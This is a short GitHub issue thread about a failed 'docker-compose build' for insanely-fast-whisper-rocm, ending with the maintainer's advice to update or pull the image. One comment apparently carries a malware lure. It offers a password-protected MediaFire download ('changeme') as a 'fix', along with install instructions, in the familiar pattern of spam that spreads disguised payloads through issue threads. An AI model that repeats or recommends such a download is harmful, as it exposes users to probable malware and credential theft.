### ISSUE TITLE
help please

### ISSUE THREAD

**Issue by lricardo09** [beecave-homelab/insanely-fast-whisper-rocm#5]
@beecave-homelab I ran 'docker-compose build' and got this:

![屏幕截图 2024-08-27 121004](https://github.com/user-attachments/assets/db9c1083-d00a-463a-90c6-e4e076d28af3)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by beecave-homelab** [comment]
You can try the updated version or pull the docker image.
